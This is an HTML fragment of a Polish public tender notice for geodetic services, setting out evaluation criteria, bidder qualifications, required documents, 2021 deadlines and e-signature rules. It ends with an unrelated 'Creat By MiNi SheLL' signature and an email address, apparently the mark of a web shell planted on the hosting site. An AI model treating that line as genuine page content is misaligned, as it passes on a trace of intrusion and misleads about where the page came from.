class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazany w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie zdolności technicznej lub zawodowej :<br/>Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą zdolną do realizacji zamówienia publicznego tj. posiadającą uprawnienia zawodowe w dziedzinie geodezji i kartografii. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył , ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty częściowej w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3)	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia w szczególności odpowiedzialne za podziały geodezyjne, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Pełnomocnictwo upoważniające do podpisania oferty, o ile ofertę<br/>podpisujepełnomocnik;2)Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców<br/>wspólnieubiegających sięo udzielenie zamówienia – jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Do oferty należy załączyć pełnomocnictwo do reprezentowania w<br/>postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W przypadku<br/>wykonawców wspólnie ubiegających się o udzielnie zamówienia, podpisane oświadczenie, o którym mowa wart. 117ust. 4 ustawy, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy -wzór oświadczenia stanowi Załącznik nr 8 do SWZ Oświadczenie Wykonawcy o<br/>niepodleganiu wykluczeniu z postępowania oraz spełnieniu warunków udziału w postępowaniu -<br/>wzór oświadczenia stanowi Załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania<br/>się o zamówienie przez Wykonawców, oświadczenie to składa każdy z<br/>Wykonawców. Zamawiający żąda od Wykonawcy wspólnie ubiegających się o udzielenie<br/>zamówienia - składa każdy z Wykonawców odpis lub informacja z Krajowego Rejestru Sądowego<br/>lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt<br/>4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji. Wykonawca nie jest zobowiązany do<br/>złożenia dokumentów, o których mowa powyżej, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 455 ustawy przewiduje możliwość dokonania zmiany zawartej<br/>umowy, wyłącznie w zakresie dopuszczalnym przepisami Ustawy, za zgodą obu Stron, w<br/>okolicznościach wskazanych w projektowanych postanowieniach umowy stanowiących<br/>załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem Platformy pod adresem:https://amw.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. sekcji 3.6 Ogłoszenia: 11. Wykonawcy mogą kierować zapytania do<br/>Zamawiającego,takżemailowo na adres: dzp.lu@amw.com.pl z dopiskiem: „Postępowanie nr<br/>DZPOL.2610.292.2021”.Zapytania kierowane na inne adresy mailowe Zamawiającego – nie<br/>będąrozpatrywane. 12.Zamawiający zaleca wczytywanie na Platformę plików w<br/>maksymalnymrozmiarze do 100 MB.13. Dokumenty przekazywane za pośrednictwem środków<br/>komunikacjielektronicznej w formieelektronicznej są sporządzane, zgodnie z § 2 Rozporządzenia<br/>PrezesaRady Ministrów z dnia 30grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywaniainformacji oraz wymagańtechnicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie(Dz. U. z 2020 r., poz. 2542) –zwane dalej jako „Rozporządzenie” – w związku z art. 18<br/>ustawy zdnia 17 lutego 2005 r. oinformatyzacji działalności podmiotów realizujących zadaniapubliczne(Dz. U. z 2020 r., poz.346 z późn. zm.), odsyłającym do rozporządzenia Rady<br/>Ministrów z dnia12 kwietnia 2012 r. wsprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dlarejestrów publicznych iwymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagańdla systemówteleinformatycznych (tj. Dz. U. z 2017 r., poz. 2247 z późn.<br/>zm.) oraz zgodnie zformatamipodpisu elektronicznego określonymi w tych przepisach prawa – w<br/>szczególności wformatach: .pdf, .doc, .docx, .rtf, .odt., .xades, .pades, .txt, .xls, .xlsx,<br/>.zip.Zamawiający zalecaprzesyłanieplików w formacie .pdf.14. Zalecenia zamawiającego<br/>odnośnie podpisuelektronicznego:a)odnośnie kwalifikowanego podpisu elektronicznego:• dla<br/>dokumentów wformacie „pdf” zalecasię podpis w formatem PAdES,• dokumenty w formacie<br/>innym niż „pdf”zaleca się podpisywaćformatem XAdES.b) odnośnie podpisu osobistego:• dla<br/>dokumentów wformacie „pdf” lub „xml”zaleca się podpis wewnętrzny (otoczony),• dokumenty w<br/>formacie innymniż „pdf” zaleca siępodpisywać podpisem zewnętrznym lub otaczającym.c)<br/>odnośnie podpisuzaufanego:•wielkośćdokumentów nie może przekraczać 10 MB (Szczegółowe<br/>informacjedotyczącepodpisuzaufanego można uzyskać pod<br/>adresem:https://www.gov.pl/web/gov/podpiszdokumentelektronicznie-wykorzystaj-podpiszaufany)<br/>Jeżelijest to możliwe, zalecane jeststosowanie podpisu otaczającego –wewnętrznego –<br/>który polegana tym, że jest zapisanyłącznie z podpisywanym dokumentem (tworzą jeden plik), a<br/>nieoddzielnie (plik podpisywany iplik podpisu).15. Informacja na temat specyfikacji<br/>połączenia,formatu przesyłanych danych orazkodowania i oznaczania czasu odbioru danych:1)<br/>szyfrowanieza pomocą protokołu TLS;2)formularze dostępne są w formacie HTML z<br/>kodowaniem UTF-8;3)wszelkie operacje opierająsię o czas serwera i dane zapisywane są z<br/>dokładnością co do setnejczęści sekundy;4) plikioferty wczytane przez wykonawcę na Platformę<br/>i zapisane, widoczne sąw Platformie jakozaszyfrowane, możliwość otwarcia plików dostępna jest<br/>dopiero poodszyfrowaniu przezzamawiającego po upływie terminu otwarcia ofert;5) oznaczenie<br/>czasuodbioru danych przezPlatformę stanowi przypiętą do dokumentu elektronicznego datę<br/>orazdokładny czas (hh:mm:ss),znajdującą się po lewej stronie dokumentu w kolumnie

Creat By MiNi SheLL
Email: jattceo@gmail.com